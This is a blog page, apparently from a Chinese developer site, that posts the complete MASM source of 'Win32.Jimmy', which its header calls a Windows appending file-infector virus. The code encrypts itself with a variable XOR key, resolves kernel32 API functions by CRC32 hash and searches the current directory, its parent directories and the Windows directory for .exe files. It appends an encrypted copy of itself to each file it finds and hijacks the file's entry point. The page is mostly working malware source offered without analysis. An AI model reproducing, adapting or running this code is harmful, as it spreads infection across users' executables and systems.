Win32.Jimmy.asm

最新推荐文章于 2022-02-25 19:38:17 发布
最新推荐文章于 2022-02-25 19:38:17 发布
阅读量1.3k 收藏
点赞数
分类专栏: Virus 文章标签: byte encryption div c


; Win32.Jimmy by SST@Hablas.com
;
; Infektion bei Win95/98/ME, WinNt4.0, WinNT2000
; Variable Xor Encryption
; Append Infector
;
; Yes, this is my first W32.Virus

.586p
.model flat
jumps
.radix 16

extrn ExitProcess:PROC

.data
Data:
filemask db '*.Exe',0
FileHandle dd 0h
NewSize dd 0h
AlignReg1 dd 0h
InfCounter dd 0h
APICRC32 dd 0h
Trash2 dd 0h

DirectoryBuffer db 255d dup (0h)
KernelMZ dd 0h
OTableVA dd 0h
MapHandle dd 0h
OldDirectory db 255d dup (0h)
K32Trys dd 0h
counter dw 0h
AlignReg2 dd 0h

APINames:
dd 0FE248274h
dd 08C892DDFh
dd 0EBC6C18Bh
dd 0B2DBD7DCh
dd 0613FD7BAh
dd 0AE17EBEFh
dd 096B2D96Ch
dd 0AA700106h
dd 094524B42h
dd 0797B49ECh
dd 0C200BE21h
dd 068624A9Dh

ATableVA dd 0h
TempApisearch2 dd 0h

APIOffsets:
XGetWindowsDirectoryA dd 0h
XCreateFileA dd 0h
XGetCurrentDirectoryA dd 0h
XSetCurrentDirectoryA dd 0h
XGetTickCount dd 0h
XFindFirstFileA dd 0h
XCreateFileMappingA dd 0h
XFindNextFileA dd 0h
XUnmapViewOfFile dd 0h
XMapViewOfFile dd 0h
XFindClose dd 0h
XCloseHandle dd 0h

TempAPI dd 0h
KernelPE dd 0h
RandVal dd 0h
FindHandle dd 0h
OldEIP dd 0h
NewEIP dd 0h
MapAddress dd 0h
alte dd 0h
NTableVA dd 0h
Trash1 dd 0h
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS

WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
groese equ (offset EndVirus - offset Virus )
NumberOfApis equ 12
encrypted = ( ( offset endofcrypt - offset encgo ) / 2 ) + 1

.code
VirusCode:
Virus:
call Delta
dw 15662d
dw 31058d
codeofcrypt dw 0h
Delta:
mov edx, dword ptr [esp]
inc esp
add esp, 3d
sub edx, ( offset Delta - 6)
mov ebp, edx
mov edi, ebp
or edi, edi
jz encgo
mov edx, encrypted
lea ecx, [ebp+encgo]
encgoloop:
xor bx, word ptr [ebp+codeofcrypt]
mov word ptr [ecx], bx
add ecx, 2
dec edx
jnz encgoloop
encgo:
jmp KernelSearchStart
NoKernel:
mov ebx, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], ebx
mov edi, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], edi
mov dword ptr [ebp+Trash2], edi
mov edi, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], edi

ExecuteHost:
cmp ebp, 0
je FirstGenHost
mov ebx,12345678h
org $-4
retEIP dd 0h
add ebx,12345678h
org $-4
retBase dd 0h
push ebx
ret

FirstGenHost:
sub ebx, ebx
push ebx
call ExitProcess
InfectEXE:
call GetRand
mov ebx, dword ptr [ebp+RandVal]
mov word ptr [ebp+codeofcrypt], bx

mov ecx, -49695d
add ecx, 49695d
add ecx, dword ptr [ebp+MapAddress]

mov eax, [ecx+3Ch]
add eax, ecx

add eax, 3Ch
mov edx, [eax]
sub eax, 3Ch
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]

mov dword ptr [ebp+AlignReg2], -1
and dword ptr [ebp+AlignReg2], edx
sbb eax, 2d
add ecx, groese
mov dword ptr [ebp+AlignReg1], 0
xor dword ptr [ebp+AlignReg1], ecx
call Align

and ecx, 0
add ecx, dword ptr [ebp+AlignReg1]

mov dword ptr [ebp+NewSize], ecx
pushad
Call UnMapFile2
popad
mov dword ptr [ebp+WFD_nFileSizeLow], ecx
call CreateMap
jc NoEXE
push dword ptr [ebp+MapAddress]
pop esi

mov edx, dword ptr [esi+3Ch]
add edx, esi

push edx
pop esi

mov ebx,0
mov bx, word ptr [esi+06h]

mov ecx, 1d
sub ebx, ecx
imul ebx, ebx, 28h

add edx, 120d
add edx, ebx
mov eax, dword ptr [esi+74h]
shl eax, 3
add edx, eax

mov eax, dword ptr [esi+28h]
mov dword ptr [ebp+OldEIP], eax
mov ecx, dword ptr [esi+34h]
push ecx
pop dword ptr [ebp+alte]

push 0
pop ecx

add ecx, [edx+10h]

push ecx
pop ebx
add edx, 14h
add ecx, [edx]
sub edx, 14h
push ecx
push ebx
pop eax
add eax, [edx+0Ch]
mov [esi+28h], eax
mov dword ptr [ebp+NewEIP], eax

sub eax, eax

add eax, [edx+10h]
push eax

add eax, groese
push eax
pop dword ptr [ebp+AlignReg1]
push dword ptr [esi+3Ch]
pop dword ptr [ebp+AlignReg2]
call Align

sub eax, eax
add eax, dword ptr [ebp+AlignReg1]
mov dword ptr [edx+10h], 0h
add dword ptr [edx+10h], eax
pop eax
add eax, groese
mov dword ptr [edx+08h], 0
add dword ptr [edx+08h], eax
mov eax, dword ptr [edx+0Ch]
add eax, dword ptr [edx+10h]
mov dword ptr [esi+50h], 0h
add dword ptr [esi+50h], eax

or dword ptr [edx+24h], 0A0000020h

mov dword ptr [esi+4Ch], 'Jimm'

pop edi
add edi, dword ptr [ebp+MapAddress]
mov ecx, ( offset encgo - offset Virus )
lea esi, [ebp+Virus]

AppendLoop:
rep movsb
push encrypted
pop ecx

CryptAppendLoop:
lodsw
xor ax, word ptr [ebp+codeofcrypt]

stosw
sub ecx, 1
jnz CryptAppendLoop

mov edx, ( -1d xor 27d )
xor edx, 27d
and edx, dword ptr [ebp+InfCounter]
sub edx, 1d
rol eax, 16d
push edx
pop dword ptr [ebp+InfCounter]
clc
ret

NoEXE:
stc
ret

InfectFile:
cmp dword ptr [ebp+WFD_nFileSizeLow], 44000d
jbe NoInfection

cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
jne NoInfection
call OpenFile
jc NoInfection

mov eax, dword ptr [ebp+MapAddress]

cmp word ptr [eax], 'ZM'
je Goodfile

push 28785d
pop ecx
cmp ecx, 28785d
je Notagoodfile

Goodfile:
cmp word ptr [eax+3Ch], 0h
jne _Notagoodfile
jmp Notagoodfile
_Notagoodfile:

xor ebx, ebx
add ebx, [eax+3Ch]

cmp dword ptr [ebp+WFD_nFileSizeLow],ebx
jb Notagoodfile
add ebx, eax

cmp word ptr [ebx], 'EP'
je Goodfile2

push 24945d
pop ecx
cmp ecx, 24945d
je Notagoodfile

Goodfile2:

cmp dword ptr [ebx+4Ch], 'Jimm'
jz Notagoodfile

mov cx, word ptr [ebx+16h]
rcl edx, 12d
and cx, 0F000h
cmp cx, 02000h
je Notagoodfile

mov cx, word ptr [ebx+16h]
and cx, 00002h
cmp cx, 00002h
jne Notagoodfile
call InfectEXE
jc NoInfection
and edx, ebx

Notagoodfile:
call UnMapFile

NoInfection:
ret


Outbreak:

mov esi, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], esi
mov ebx, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], ebx

call InfectCurDir
mov eax, ebp
add eax, offset OldDirectory
push eax

mov eax, ( 255d xor 32d )
xor eax, 32d
push eax
call dword ptr [ebp+XGetCurrentDirectoryA]

lea edx, [ebp+OldDirectory]

mov ebx, edx

TravelDownLoop1:
inc edx
cmp byte ptr [edx], 0
jne TravelDownLoop1
TravelDownLoop2:
add edx, -1d
cmp byte ptr [edx], '/'
jne TravelDownNext
mov byte ptr [edx], 0
push ebx
call dword ptr [ebp+XSetCurrentDirectoryA]
pushad
call InfectCurDir
popad
mov byte ptr [edx], '/'
TravelDownNext:
cmp edx, ebx
jne TravelDownLoop2

mov eax, ( 255d + 16d )
sub eax, 16d
push eax
lea ecx, [ebp+DirectoryBuffer]
push ecx
call dword ptr [ebp+XGetWindowsDirectoryA]
xchg ecx, edx
push edx
call dword ptr [ebp+XSetCurrentDirectoryA]
call InfectCurDir

lea edx, [ebp+OldDirectory]
push edx
call dword ptr [ebp+XSetCurrentDirectoryA]

jmp ExecuteHost

GetApis:
push NumberOfApis
pop eax

mov esi, 37168d
sub esi, 37168d
add esi, dword ptr [ebp+KernelPE]

mov edi, [esi+78h]
add edi, [ebp+KernelMZ]

add edi, 28d

mov esi, dword ptr [edi]
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+ATableVA], esi

inc edi
add edi, 3d

mov esi, dword ptr [edi]

add edi, 4d
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+NTableVA], esi

mov esi, dword ptr [edi]
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+OTableVA], esi

lea ecx, [ebp+APINames]
mov esi, ebp
add esi, offset APIOffsets

GetApisLoop:

and word ptr [ebp+counter], 0h


inc ecx
add ecx, 3d

xor edx, edx
add edx, dword ptr [ebp+TempAPI]
mov dword ptr [esi], edx

inc esi
add esi, 3d
dec eax
jnz GetApisLoop
jmp Outbreak

CRC32:
pushad

mov edi, -28264d
add edi, 28264d
add edi, esi
push 0
pop ebx
add ebx, edi
LenCRC:

sub ebx, -1d
cmp byte ptr [ebx], 0
jne LenCRC
sub ebx, edi

mov esi, ebx

add esi, 1d
cld

mov eax, 16859d
sub eax, 16859d
dec eax
sub eax, 0d

mov edx, eax
NextByteCRC:

mov ebx, -6128d
add ebx, 6128d

sub ecx, ecx
mov bl, byte ptr [edi]

inc edi
xor bl, al
mov al, ah
mov ah, dl
mov dl, dh
mov dh, 8
NextBitCRC:
shr cx, 1
rcr bx, 1
jnc NoCRC
xor bx,08320h
xor cx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor eax, ebx
xor edx, ecx
dec esi
jnz NextByteCRC
not edx
not eax
mov ebx, edx
rol ebx, 16d
mov bx, ax
mov dword ptr [ebp+APICRC32], ebx
popad
ret

SearchAPI1:
pushad

push 0
pop ebx
add ebx, dword ptr [ebp+NTableVA]
and dword ptr [ebp+Trash1], ebx
sar edx, 10d

SearchNextApi1:
push ebx
mov eax, dword ptr [ebx]
add eax, [ebp+KernelMZ]

push eax
pop ebx

push ebx
pop esi
push esi
pop dword ptr [ebp+TempApisearch2]
push ecx
cld

call CRC32

mov eax, 52825d
sub eax, 52825d
add eax, dword ptr [ebp+APICRC32]
sub eax, dword ptr [ecx]
cmp eax, 0
je FoundApi1

ApiNotFound:
pop ecx

mov esi,0
add esi, dword ptr [ebp+TempApisearch2]
pop ebx

inc ebx
add ebx, 3d
add word ptr [ebp+counter], 1h
cmp word ptr [ebp+counter], 2002h
je NotFoundApi1
jmp SearchNextApi1

FoundApi1:
add esp, 8d

xor edx, edx
mov dx, word ptr [ebp+counter]

clc
rcl edx, 1
add edx, dword ptr [ebp+OTableVA]
push edx
pop ebx
movzx edx, word ptr [ebx]
clc
rcl edx, 2h
add edx, dword ptr [ebp+ATableVA]

mov ebx, dword ptr [ebp+KernelMZ]
add ebx, dword ptr [edx]
mov dword ptr [ebp+TempAPI], -1
and dword ptr [ebp+TempAPI], ebx
cmp byte ptr [ebx], 0cch
je ExecuteHost
popad
ret

NotFoundApi1:

pop esi
popad
jmp ExecuteHost

FindNextFileProc:
call ClearOldData
mov edx, ebp
add edx, offset WIN32_FIND_DATA
push edx
mov ebx, dword ptr [ebp+FindHandle]
push ebx
call dword ptr [ebp+XFindNextFileA]
ret

ClearOldData:
pushad

push 276d
pop eax
lea edx, [ebp+WFD_szFileName]

ClearOldData2:
mov byte ptr [edx], 0h

dec eax
jnz ClearOldData2
popad
ret

FindFirstFileProc:
call ClearOldData
lea edx, [ebp+WIN32_FIND_DATA]
push edx
push ebx
call dword ptr [ebp+XFindFirstFileA]
push eax
pop dword ptr [ebp+FindHandle]
ret

Align:
pushad

mov edx,0
mov eax, dword ptr [ebp+AlignReg1]
mov ecx, dword ptr [ebp+AlignReg2]
div ecx

inc eax
mul ecx
mov dword ptr [ebp+AlignReg1], 0h
add dword ptr [ebp+AlignReg1], eax
popad
ret
db 'Win32.Jimmy - SST@Hablas.com',0

OpenFile:
push 0
push 0
push 3
push 0
push 1
mov ebx, 80000000h or 40000000h
push ebx
lea ebx, WFD_szFileName
add ebx, ebp
push ebx
sal ecx, 28d
call dword ptr [ebp+XCreateFileA]

add eax, 1
jz Closed
dec eax

mov dword ptr [ebp+FileHandle], eax

CreateMap:
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
push ecx

and edx, 0
push edx
add ebx, eax
push ecx
push edx
push 00000004h
push edx
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+XCreateFileMappingA]
mov dword ptr [ebp+MapHandle], -1
and dword ptr [ebp+MapHandle], eax
pop ecx
or eax, eax
jz CloseFile

push 0
pop edx
push ecx
push edx
push edx
push 2h
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XMapViewOfFile]
test eax, eax
jz UnMapFile
mov dword ptr [ebp+MapAddress], -1
and dword ptr [ebp+MapAddress], eax
clc
ret

UnMapFile:
Call UnMapFile2

CloseFile:
push dword ptr [ebp+FileHandle]
Call [ebp+XCloseHandle]

Closed:
stc
ret

UnMapFile2:
push dword ptr [ebp+MapAddress]
call dword ptr [ebp+XUnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XCloseHandle]
ret

InfectCurDir:
mov [ebp+InfCounter], 2d
mov ebx, offset filemask
add ebx, ebp

call FindFirstFileProc
inc eax
jz EndInfectCurDir

InfectCurDirFile:
call InfectFile

sub ecx, ecx
add ecx, dword ptr [ebp+InfCounter]
inc ecx
dec ecx
jz EndInfectCurDir

call FindNextFileProc
cmp eax, 0h
jne InfectCurDirFile

EndInfectCurDir:

push dword ptr [ebp+FindHandle]
call dword ptr [ebp+XFindClose]

ret

KernelSearchStart:

mov eax, dword ptr [esp]

shr eax, 16d
rol eax, 16d

mov dword ptr [ebp+K32Trys], 4h

GK1:
mov edx, -1d
and edx, dword ptr [ebp+K32Trys]
or edx, edx
jz NoKernel

cmp word ptr [eax], 'ZM'
je CheckPE

GK2:

mov ebx, ( 65536d + 32d )
sub ebx, 32d
sub eax, ebx
dec dword ptr [ebp+K32Trys]
jmp GK1

CheckPE:
mov edx, [eax+3Ch]
xchg edx, eax
add eax, edx
xchg edx, eax

movzx ebx, word ptr [edx]
sub ebx, 'EP'
jz CheckDLL
jmp GK2

CheckDLL:

KernelFound:
mov dword ptr [ebp+KernelMZ], -1
not ecx
and dword ptr [ebp+KernelMZ], eax
mov dword ptr [ebp+KernelPE], edx

lea eax, [ebp+offset GetApis]
push eax
ret

GetRand:
pushad
add edx, dword ptr [ebp+RandVal]
call dword ptr [ebp+XGetTickCount]
add edx, eax
mov dword ptr [ebp+RandVal], 0
add dword ptr [ebp+RandVal], edx
popad
ret
endofcrypt:
EndVirus:
end VirusCode

gzfqh
关注
专栏目录
x.264编译问题合集
王世宏的专栏
06-13 2713
*x264 for vc http://lspbeyond.go1.icpcn.com/x264/index.htm  转载 *x264编译问题合集(不断更新中...) NOTE:vc71下试验的错误情况,vc6下会有稍许差别,但也类似。 [1] x264路径带空格 错误: 正在执行自定义生成步骤 nasm: error: more than one input file spec
ARM中断向量表的简单分析
win9
01-10 7520
一般编写arm的裸机程序的时候,创建中断向量表就把它放在0x00000000~0x0000001c中,一般都放在这个位置上。但是中断向量表也可以放在0xffff0000~0xffff001c中,知道这是怎么设置的么?开始看到的时候真的有点奇怪,因为在学习arm的时候,根本没去看arm中的协处理器CP15中的c1控制寄存器中的v位来控制,我们一般都使用默认的值0,则必须将中断向量表放在0x00000
go技术文章梳理(2017)
韩亚军的博客
06-22 5万+
gocn_news_2017-12-31 分布式系统下的Go channels https://medium.com/@matryer/introducing-vice-go-channels-across-many-machines-bcac1147d7e2 Go Socket编程之teleport框架是怎样炼成的 https://www.jianshu.com/p/7120...
元宇宙引擎脑语言2500令v0.5.6
脑语言
02-08 1万+
  脑语言一令是一个不断变化的过程,而我们的能力也十分有限,对于翻译不准确、表达不合适、定义不严谨、意思不合理等等问题都是我做得还不够好的原因,欢迎指正与交流,以便通过“共产”的方式让“广集天下智慧”的机制及早在人类世界建立。   过去,我们总是想让AI更接近人类,脑语言的存在也是为了让人类的能力更接近AI
Oracle 11g ADRCI工具使用
dba_monkey的博客
03-03 1090
在Oracle中,各个组件(监听器、数据库实例、各种配置工具)在安装和运行时都会有相应的日志Log和跟踪文件Trace生成。Oracle 11g之前,这些信息都是零散的分布在Oracle组件目录中的。在11g,Oracle推出了ADR(Automatic Diagnostic Repository)的概念,将这些信息统一的列入到其中管理。   1、ADRCI初探   在11g中,提
mutable explicit volatile
ai_huafenglin
10-22 302
zf0 hack
热门推荐
08-26 20万+
  _/_/_/_/_/ 444444444 ~~~~~~ _/ _/_/ _/ _/_/ _/_/ 4;;;;;;;;4 Internet Superheroes ~ _/
win32asm.rar
01-14
win32asm】是关于Windows 32位汇编语言编程的知识集合。汇编语言是一种低级编程语言,它直接对应于计算机的机器指令,每个汇编指令通常都与一条特定的机器码相对应。在Windows环境下,使用Win32汇编语言可以实现对...
Win32-ASM.zip_Asm_win-asm
09-14
Win32-ASM.zip_Asm_win-asm这个资源包显然是针对Win32汇编语言编程的一个详细教程,对于想要深入理解计算机工作原理、优化代码性能或者进行系统级编程的开发者来说非常有价值。 Win32汇编语言是为Windows 32位操作...
masm win32asm.
05-29
masm win32asm.
Caused by: java.lang.ClassNotFoundException: org.objectweb.asm.Type异常
09-16
在这个特定的场景中,异常堆栈跟踪显示 `Caused by: java.lang.ClassNotFoundException: org.objectweb.asm.Type`,这表明在运行时,系统无法找到`org.objectweb.asm.Type`这个类。`org.objectweb.asm` 是一个用于...
BOSS_key_asm.rar_asm 程序_masm_win32asm
09-24
标题中的“BOSS_key_asm.rar_asm 程序_masm_win32asm”表明这是一个关于使用汇编语言(ASM)编写的程序,具体是用MASM(Microsoft Macro Assembler)在Win32环境下实现的“老板键”程序。老板键通常是一种快捷方式,...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9076
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3605
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7110
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1752
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2724
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 4180
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
Win32Asm基础教程:从入门到实践
"Win32Asm教程(基础篇)" 本文主要介绍Win32汇编语言的基础知识,适合初学者学习。通过本教程,你可以了解到如何在Windows 32位环境下编写汇编语言程序,并利用Windows API进行系统调用。 Win32汇编(Win32Asm)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值